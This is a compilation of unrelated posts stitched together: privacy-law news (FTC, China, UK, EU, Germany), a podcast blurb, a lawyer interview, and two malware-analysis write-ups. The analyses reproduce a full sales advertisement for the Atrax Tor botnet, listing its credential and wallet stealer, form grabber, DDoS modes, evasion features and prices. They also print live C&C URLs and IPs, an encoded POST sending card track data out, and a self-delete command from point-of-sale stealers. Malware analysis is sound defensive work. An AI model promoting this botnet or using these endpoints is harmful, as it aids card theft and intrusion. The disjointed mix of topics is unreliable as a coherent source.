The seminar on predictive scoring will focus on the uses of predictive scores, ranging from identity verification and fraud prevention to marketing and advertising. The panel will discuss questions such as the accuracy of the scores and the underlying data used to create them, the privacy concerns surrounding the use of the scores and what consumer protections should be provided.

The seminar on consumer-generated health data will examine the types of websites, products and services consumers are using to generate and control their health data, the actions companies are taking to protect consumers’ privacy and security and whether advertising networks impose restrictions on tracking health data.

The Mobile Device Tracking seminar will be held on February 19, 2014 and the Alternative Scoring Products seminar will be held on March 19, 2014. The date of the Consumer Generated and Controlled Health Data seminar has not been announced. The FTC has invited comment from the public on the proposed topics, and will issue staff reports following the sessions.

Interview with Jens ‘Atom’ Steube, ScriptAlert1 with Thomas KacKenzie & Ryan Dewhurst – Episode 355, Part 1 – December 5, 2013

Before Jens 'Atom' Steube wrote hashcat, he was a bug hunter for fun, focusing on open source software. After 2005 he only did bug hunting on commercial software and therefore not allowed to disclose product names. In 2010 he started hashcat and since that time it's the only project he's been working on.

Thomas MacKenzie works for NCC Group as a Security Consultant, conducting all different types of security assessments. Ryan Dewhurst works for NCC Group as a Security Consultant, conducting all different types of security assessments. ScriptAlert1.com is a very simple and concise platform to explain Cross-Site Scripting, it's dangers and mitigation. Our aim is for penetration testers to include a link in their pen test reports to the resource and to get it to be the de facto description for semi-technical/tech savvy managers.

China’s Supreme People’s Court Releases Provisions on the Online Issuance of Judgment Documents by People’s Courts

On November 21, 2013, the Supreme People’s Court of China passed the Provisions on the Online Issuance of Judgment Documents by People’s Courts (the “Provisions”), which will take effect on January 1, 2014. The Provisions replace earlier rules (of the same title) enacted by the Supreme People’s Court on November 8, 2010, and generally focus on improved implementation of the principles of standardizing the online issuance of judgment documents, promoting judicial justice and enhancing the public credibility of the judiciary.

The Provisions also contain a number of suggestions for the protection of personal information. These recommendations indicate that:

  • Judgment documents involving state secrets, personal private matters or cases involving juvenile delinquency shall not be published on the Internet.
  • When issuing online judgment documents, a People’s Court shall delete the following information: (1) the home address, contact information, ID number, bank account number and any other personal information of a natural person; (2) relevant information of a juvenile; (3) the bank account number of an entity or other organizations; (4) business secrets; and (5) other content inappropriate for release on the Internet.
  • A People’s Court shall retain the real information of the name or title of the party concerned upon issuing online judgment documents, but the names of the following parties or litigants shall be processed anonymously through the use of alternate symbols: (1) the parties and their statutory agents in marriage and family cases or inheritance disputes; (2) victims and their statutory agents, witnesses and expert witnesses in criminal cases; (3) any defendant who is sentenced to fixed-term imprisonment of not more than three years and is exempted from criminal punishment (and who is not a recidivist or habitual offender).

The Provisions are intended to make the judicial system more independent and more transparent. At the same time, it remains to be seen how easily searchable the judgment opinion network will be after the Provisions are implemented. The Provisions represent the latest step in the ever-growing array of sector-specific regulations governing personal information in China, and may suggest that legislative and regulatory activities for the protection of personal information will continue.

FTC Settles Charges with Flashlight Mobile App Developer

On December 5, 2013, the Federal Trade Commission announced a proposed settlement with mobile app developer Goldenshores Technologies, LLC (“Goldenshores”) following allegations that Goldenshores’ privacy policy for its popular Brightest Flashlight Free app deceived consumers regarding how the app collects information, including geolocation information, and how that information may be shared with third parties. Brightest Flashlight Free, developed for the Android operating system, allows its users to use their cell phones as flashlights.

The FTC’s complaint states that the privacy policy and end user license agreement for the Brightest Flashlight Free app “does not disclose or adequately disclose to consumers that the Brightest Flashlight App transmits or allows the transmission of device data, including precise geolocation along with persistent device identifiers, to third parties, including advertising networks.”

The proposed settlement agreement and consent order bars Goldenshores from misrepresenting how the Brightest Flashlight Free app collects, uses or discloses information, and the extent to which users may exercise control over such use or disclosure. The proposed settlement also requires Goldenshores to obtain “affirmative express consent” from users prior to transmitting geolocation information from the Brightest Flashlight Free app and to “clearly and prominently” indicate to users: (1) that the Brightest Flashlight Free app collects or transmits geolocation information; (2) how geolocation information may be used; (3) why the app accesses geolocation information; and (4) the third parties that receive geolocation information directly or indirectly from the app. Finally, the proposed settlement requires Goldenshores to delete any personal information it has previously collected via the Brightest Flashlight Free app.

In announcing the settlement, Jessica Rich, Director of the FTC’s Bureau of Consumer Protection, commented that the Brightest Flashlight Free app left consumers “in the dark about how their information was going to be used.”

The settlement is open for public comment until January 6, 2014.

Read the FTC Business Center Blog’s post about the Goldenshores settlement.

Update: On April 9, 2014, the FTC approved the final settlement order with Goldenshores.

New UK Cybersecurity Standard in the Works

On November 28, 2013, the UK government published a paper in response to its March 2013 consultation on cybersecurity standards (“Response Paper”), and announced that it will create a new cybersecurity standard. The original consultation concluded in October 2013.

UK Consultation
The consultation focused primarily on assessing the suitability of existing cybersecurity standards (such as the IASME standards and the ISO 27000-series standards) for use by businesses and government agencies. The consultation sought input from businesses, standards bodies, law firms and other interested parties. The consultation concluded that no existing standard is suitable because all of the existing standards have perceived weaknesses, including complexity, high costs and implementation difficulties.

Government Response Paper
The Response Paper explains that the UK government will now work with cybersecurity industry representatives to develop a new standard to serve as the government’s preferred cybersecurity standard. This new standard will be largely based upon key ISO 27000-series standards and will focus on basic cyber hygiene. It is intended to be a “significant improvement” over existing standards, and will provide a simple framework that can be implemented by small and medium enterprises. At this stage, it is not clear what requirements the new standard will include, or whether it will appeal to larger businesses.

According to the Response Paper, the UK government aims to publish the new standard by early 2014. Once implemented, the new standard will enable businesses that conform to the standard to publish a “badge” on their websites and in their promotional materials, indicating that they have achieved a certain level of cybersecurity. It remains to be seen whether there will be significant interest in adopting this standard outside of government departments.

View the UK government’s existing cybersecurity guidance.

Win32/Atrax.A

Atrax is a TOR botnet, you can read about it on the excellent post of Aleksandr.
Someone on kernelmode.info posted recently a fresh sample:
MD5: 44a6a7d4a039f7cc2db6e85601f6d8c1

Fun things also, the coder leaved a message:
"Nice blog post ESET 2013/07/24 Greetz to KernelMode.info"

Atrax advertising:
Programming language: C (No C++!)
OS: Win XP - 8.1 (all x86/x64)
Admin rights required: No
Special: Tor Integration, spawns no process -> x64/x86 Process injection, this is the first public bot which supports windows 8!
File size: ~1,2 MB (because of Tor integration and x64/x86 Code), you can get a free assembler web downloader ~2KB

Why Tor?
The bot communicates only via Tor with your panel. With Tor you can get a really nice anonymous Botnet. It is almost impossible (well, theoretically it is possible, but Silkroad is still online, so don’t worry) to get your server ip and put your server down. You get a Tor onion domain and this domain cannot be blacklisted (lasts “forever”). So to sum up: If you don’t do any configuration mistakes, your botnet will probably last very long.
You need a VPS or a dedicated server to host this tor botnet, because you need to set up a hidden service. Because of tor the botnet is consuming more hardware resources than typical botnets. Probably it is not possible to get a 10 Dollar/year VPS and trying to host over 1k victims.

Setting up hidden service instructions:
- https://www.torproject.org/docs/tor-hidden-service.html.en
- http://kendildonic.wordpress.com/2011/08/03/build-a-tor-hidden-service-onion-web-site-with-a-cheap-vps/
- A little manual to set it up on debian based linux systems is included

The bot consist of a core and various plugins/addons. Each plugin/addon costs some money. Every plugin also communicates over tor.
(If somebody is interested in developing a plugin -> contact me)

Some basic features:
- Autostart, Persistence
- x86/x64 Code, x86/x64 Injection with Heavens Gate technique
- Anti-Analyzer (Protection against e.g. anubis.iseclab.org, malwr.com)
- If you need: Anti-VM (Please request it explicitly)
- Anti-Debug/Anti-Hook Engine
- Doesn't use suspicious windows apis like GetProcAddress/GetModuleHandle
- Plugins are saved to disk with AES-128-CBC encryption (random key)
- Communication over tor is already encrypted, so no extra communication encryption
- Every Plugin and the core is watermarked. Leak -> No updates/support. (All updates are free)
- Everything UNICODE

Panel:
- http://www0.xup.in/exec/ximg.php?fid=11907674
- http://www0.xup.in/exec/ximg.php?fid=68935688
- http://www0.xup.in/exec/ximg.php?fid=20127007
- http://pixs.ru/showimage/2ci7png_4898170_9693543.png
- http://pixs.ru/showimage/ekahjpg_4965220_9693535.jpg
- Login Bruteforce protection, panel will be locked after x failed logins (captchas are not secure)
- SQL-Injection proof
- No IonCube

Standard Features:
- Kill
- Update
- Download (over Tor), Execute (Commandline-Parameter allowed)
- Download (over Tor), Execute (Commandline-Parameter allowed) in memory (Your file doesn't need to be FUD)
- Install Plugin
- Installation List (A list with all installed applications)

The Core has only a few functions, but they are already pretty useful. Yes you can e.g. start your own uncrypted Bitcoin Miner with the "Download over Tor, Execute Memory" function.
I will give you a plain bitcoin miner exe or just use the binaries you can find in this board.

A bot addon is integrated in the main EXE, so no extra file.
A bot plugin is not integrated, you will receive extra file(s).

Addon - DDOS:
- Full IPv6 ´+ IPv4 support.
- UDP Flood
- TCP Flood
- TCP Connect Flood (Some idiots call this "SYN-Flood")
- HTTP Slowloris (based on http://ckers.org/slowloris/)
- HTTP RUDY (R-U-Dead-Yet, based on https://code.google.com/p/r-u-dead-yet/)
- HTTP File Download (Good if your target hosts a file >1MB)
- If you need some more methods, contact me.

Addon - Form Grabber:
- Firefox, Internet Explorer x86/x64, Chrome SSL HTTP POST Grabber
- Anti-Hook Engine (Removes hooks from other bots)
- Own Hook Engine (No copy/paste crap)
- Tested with Browser: Internet Explorer v7/v9/v10, Firefox v11/v21/v22/v24, Chrome v27/v30
- Tested with Website: PayPal, Amazon, Bitcoin.de, Mt. Gox, eBay, Googlemail, vBulletin Boards
- SPDY v3 support
- IE 7/8/9/10 (Enhanced) Protected Mode Support
- Grabs only important POST Form Requests.
- Searches automatically for Username/Password/Email and CC (Possible CC will be displayed in panel)
- Screenshot: http://www0.xup.in/exec/ximg.php?fid=24471254

Addon - Socks 5 Reverse Socks:
- You need a 2nd VPS/dedicated Server to keep your main C&C server secure!
- Server is a Java application to achieve complete platform independence -> All OS supported!
- Socks 5 with and without authentication
- Controlled via tasks
- You can run different instances of the proxy sever for different purposes
- Works on all clients because it is a reverse socks (No SSH crap!)
- Panel screenshot: http://www0.xup.in/exec/ximg.php?fid=15537396

Plugin - Stealer:
- Steals all current browser versions.
- Steals: CHROME, FIREFOX, SAFARI, INTERNET EXPLORER, OPERA, FILEZILLA, PIDGIN, JDOWNLOADER v1 + v2, GIGATRIBE, THUNDERBIRD, WINDOWSKEY, FLASHFXP, ICQ, MSN, WINDOWS LIVE, OUTLOOK, PALTALK, STEAM Username Only, TRILLIAN, MINECRAFT, DYNDNS, SMARTFTP, WSFTP, Bitcoin Wallet (Armory, Bitcoin-Qt, Electrum, Multibit)
- If you need something more -> ask me.
- Special: JDownloader v1/v2, Bitcoin Wallet Stealer (whole wallet.dat will be uploaded), IE10 + IE11 support!

Plugin - Coin Mining (Experimental)
- Bitcoin / Litecoin Miner
- Hash Rate displayed in panel
- Based on Ufasoft Miner v0.68 (updated regularly)
- Mining with tasks http://www0.xup.in/exec/ximg.php?fid=60729560

Price:
Core: $250 (Launch price! Read information below)
Addon DDOS: $90
Addon Form Grabber: $300
Addon Reverse Socks: $400
Plugin Stealer: $110
Plugin Coin Mining: $140 (Experimental)

Payment only with Bitcoin. Market price from https://www.bitcoin.de "Current Bitcoin price" - 10%, because of high exchange rate fluctuations!
Bugfix Updates and Support is free of course.
Please keep in mind: This Core Price will be higher soon. This Bot is currently in beta stage, so probably there are still some bugs. Get it now pay less + maybe bugs, wait: pay more and bot is stable

- Builder available?
No, your tor domain will last forever if you don't lose the RSA key.

- Is the bot bin FUD?
No, you need a crypter. This bot should work with all crypters, but .NET Crypters are special. Tell me what .NET crypter you want to use and we will see.
I can give you a free .NET Crypter to get you started!

- The bot is too expensive, noob!
I don't care if you think it is too expensive.

- The filesize sucks, noob!
I don't care.

Alright, let's have a look on the C&C of the sample posted on kernelmode.
estrgnejb7sjly7p.onion >> 46.183.219.xxx
The httpd is not properly configured to run with the IP
So, let's have a look from TOR.

Login:

Statistics:

Plugin statistics:

Spreader statistic:

Bots:

Bot legend:

Bot information:

AtraxStealer plugin logs:

Formgrabber plugin logs:

Formgrabber plugin logs detail:

Plugins:

Tasks:

Create a new task:

Task setting for 'Download & Execute':

Task execution:

Edit a task:

Settings:






Law360 Features Lisa Sotto in Female Powerbrokers Series

On December 5, 2013, Lisa J. Sotto, partner and head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP, was featured in Law360’s “Female Powerbrokers” Q&A series. The series focuses on female lawyers and their personal experiences as they have grown into leadership positions within their respective firms. Here is an excerpt from Sotto’s interview:

Q: How did you break into what many consider to be an old boys’ network? 

A: For me, the trick was choosing niche areas that were not well established. I started as an environmental lawyer in 1987, and while it was not a new field at the time, it certainly was not a deeply established men’s club. And then, transitioning into privacy law — a field that was absolutely untrodden at the time — meant that there was no “old boy’s network.” So for both of these areas, I didn’t have to break in. I will say that, early in my career, I walked into many conference rooms in which I was the only female. But I was stunned just a couple of weeks ago to spend two hours in a conference room in which I was the only woman out of 15 people — that hadn’t happened to me in years!

Read the full Q&A feature.

EU – Public consultation on the review of the EU copyright rules

The Euopean Commission has lauched a public consultation on the review of the EU copyright rules. All stakeholders are welcome to contribute to this consultation. Contributions are particularly sought from consumers, users, authors, performers, publishers, producers, broadcasters, intermediaries, distributors and other service providers, Collective Management Organisations, public authorities and Member States.

Open data and German coalition agreement – a step forward

The new German coalition agreement- all 185 pages – is available online. It is currently being voted on by SPD members. It includes a number of references to open data which constitute a step forward in the degree of visibility and political commitment at federal level in Germany:
  • Public sector data – p. 153

    The first open data projects in Germany demonstrate the potential of open data. The Federal administration with all its agencies must be a pioneer, on the basis of a law, for the provision of open data in standardized machine-readable formats and under free licence conditions. We want to provide an open data portal for federal, state and local governments. The coalition seeks to achieve Germany's accession to the international Open Government Partnership initiative.

  • Scientific information – p. 134

    We will develop a comprehensive open access strategy that improves the general conditions for an effective and permanent access to publicly funded publications and also to data (open data)

  • Transport data – p.44

    Our goal is a sustainable mobility culture and a user-friendly network of different modes of transport. We encourage multi-modal data platforms on an open-data basis containing information on mobility services, congestion, delays and schedule data. With the networking of transport information and ticketing systems people can be provided with innovative digital mobility services.

  • Bundestag proceedings – p. 152

    We want to expand digital coverage of the Bundestag and its meetings and of committee meetings and public hearings (e.g. by streaming). As soon as possible we will provide publications such as printed materials and minutes in open-data compatible formats under free licence conditions.

Win32/Spy.POSCardStealer.O and unknown POS Sniffer

Finally some new stuff (hmm, no)
Let's talk about Win32/Spy.POSCardStealer.O identified by ESET.
It's pretty lame but let's see it anyway.

On the first procedure the malware will register a reg key in HKLM with 'HDebugger'

And start to search for track2:

Then he call the C&C (hoqou.su/forum.php):
• dns: 1 ›› ip: 62.173.149.140 - adresse: HOQOU.SU

Do a sleep of 120000 ms (2 minutes):

And redo into the track2 research procedure.
When finaly something is found the malware took the PID of the program, the process name and the mem adress:
Then he send it to the C&C...

POST req example:
%5BPID%201224%20%28MSR.exe%29%5D%0D%0A%20ADDR%20000B2F90%3A%20%224111111111111111%3D13071010000000000666%22%0D%0A%5BEOF%5D%0D%0A

This malware can't receive orders, and don't have a special mechanism.
On another sample, i've found another domain: rolex216.8s.nl/go/go.php
• dns: 1 ›› ip: 41.223.53.155 - adresse: ROLEX216.8S.NL

This malware was downloaded from a downloader who now download another malware who brute force wordpress sites (maybe i will talk about this one soon).

Still with POS Malware a 'new' threat (Detected only with generic signatures) appeared.
https://www.virustotal.com/fr/file/746cb8cf77b0b00f14c424731948d8fc13378978d193d75f944b12c25e98e0e2/analysis/1376958328/
I got this sample since august from a guys who found this on his POS systems.
In 3 months there is still no one who have do an accurate signature.

At first he will create two directories 'System\Hidden' inside %APPDATA%\Microsoft\Windows

Do a directory test to know from where the executable is launched:

Copy the EXE and launch the copy:

A registry key "Svchost-Windows-Redquired" is created for persistence

Enter in a procedure to remove the original file:
/c del C:\DOCUME~1\ADMINI~1\Bureau\svchost.exe >> NUL
And as excepted send a exit code just after...

So what's do the fresh copy inside the 'good' folder ?
Firstly he take the jump due to the directory test.

On the procedure he will compute a string based on GetSystemFileTime, then he start to enumerate process.
He will open them one by one, read the memory and look for track 2 in a subroutine.
Usual stuff.
They search by partern from the second part of tracks 2 '=13' '=14' '=15' etc..

A file 'Sys.dll' is created:
timestamped with
(encoded)
And wrote:

Do a sleep of 450000 ms (7 1/2 minutes)

if a dump is found the dump is encoded:
And wrote in Sys.dll.

Then they are sent one by one to the C&C:

http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/?update=daily&random=563245325050324532495458495358
http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/redirect.php
http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/website.php
5.9.96.235
The md5 hash '8edf4bc26f9c526ff846c9068f387dac' is 'zabeat'